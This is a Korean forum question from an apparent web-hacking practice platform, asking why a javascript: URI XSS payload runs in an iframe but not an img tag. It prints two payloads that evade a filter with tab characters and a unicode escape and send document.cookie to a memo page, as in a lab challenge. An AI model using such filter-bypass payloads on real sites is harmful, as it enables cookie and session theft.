iframe과 img 태그의 차이 질문
<iframe src="javascri pt:locatio n.href='/memo?memo='+\u0064ocument.cookie">
<img src="javascri pt:locatio n.href='/memo?memo='+\u0064ocument.cookie">
문제 해결은 탭 문자와 유니코드를 이용해 필터링 우회하여 해결하였습니다.
저는 여태까지 로드맵을 진행하면서 XSS 문제는 img 태그와 onerror 이벤트를 이용하여 해결했는데, 이번에는 img를 사용한 코드가 동작하지 않았습니다.
위의 두 코드가 실행되는 데 어떤 차이가 있나요?
#web
답변
0
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
